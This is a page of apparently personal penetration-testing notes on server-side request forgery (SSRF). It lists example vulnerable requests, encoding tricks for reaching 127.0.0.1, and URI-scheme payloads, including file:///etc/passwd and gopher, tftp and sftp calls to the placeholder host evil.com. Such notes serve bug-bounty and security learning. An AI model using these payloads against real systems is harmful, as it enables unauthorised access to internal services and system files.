0Sec
Elite
Elite0Sec
Elite
Elite0Sec
  • ๐ŸฅทWhoami
  • ๐Ÿ”Web-AppSec
    • ๐Ÿ˜€Reconnaissance
      • Scope
    • Features Abuse
      • 2FA
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
    • Technologies
      • WordPress
    • Information Disclosure
    • CSRF
    • CRLF Injection
    • Forgot Password
    • Account Takeover
    • LFI & RFI
    • OAuth Misconfiguration
    • Open Redirect
    • SQL injection
    • SSRF
    • Web Cache Deception
    • Web Cache Poisoning
    • Web AppSec Nots
    • Broken Link Injection
    • Checklist
    • Methodology v1.0
    • Checklist 1.1
  • ๐ŸฅทNetwork-pentest
    • Recon
    • Windows Privilege Escalation
    • Active Directory
      • AD Enumeration
        • Users, Computer, Groups
        • BloodHound Enumeration
        • Credentials
        • Credential Dumping
        • PRIVILEGE ESCALATION
      • AD Techniques
        • MSSQL Injection
        • MSSQL AD Abuse
        • Linked Server Exploitation
        • Domain privEsc
          • Kerberos brute-force
          • AS-REP Roasting
          • Kerberoasting
          • Kerberos Unconstrained Delegation
          • Kerberos Constrained Delegation
          • PTH, PTT, Overpth, ptk
          • Silver ticket
          • Golden ticket
          • LLMNR Attack
      • AD Cheat Sheet
    • Red Team Note
    • Notes
Powered by GitBook
On this page
  1. Web-AppSec

SSRF

Usually, it can be found in the request that contain request to another url, for example like this

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

or

GET /image?url=http://192.168.1.1/
Host: example.com

How to exploit

  1. Basic payload

http://127.0.0.1:1337
http://localhost:1337

  1. Hex encoding

http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1

  1. Octal encoding

http://127.0.0.1 -> http://0177.0.0.01

  1. Dword encoding

http://127.0.0.1 -> http://2130706433

  1. Mixed encoding

http://127.0.0.1 -> http://0177.0.0.0x1

  1. Using URL encoding

http://localhost -> http://%6c%6f%63%61%6c%68%6f%73%74

  1. Using IPv6

http://0000::1:1337/
http://[::]:1337/

  1. Using bubble text

http://โ“”โ“งโ“โ“œโ“Ÿโ“›โ“”.โ“’โ“žโ“œ

Use this https://capitalizemytitle.com/bubble-text-generator/

How to exploit (URI Scheme)

  1. File scheme

file:///etc/passwd

  1. Dict scheme

dict://127.0.0.1:1337/

  1. FTP scheme

ftp://127.0.0.1/

  1. TFTP scheme

tftp://evil.com:1337/test

  1. SFTP scheme

sftp://evil.com:1337/test

  1. LDAP scheme

ldap://127.0.0.1:1337/

  1. Gopher scheme

gopher://evil.com/_Test%0ASSRF
PreviousSQL injectionNextWeb Cache Deception

Last updated 5 months ago

๐Ÿ”
  • How to exploit
  • How to exploit (URI Scheme)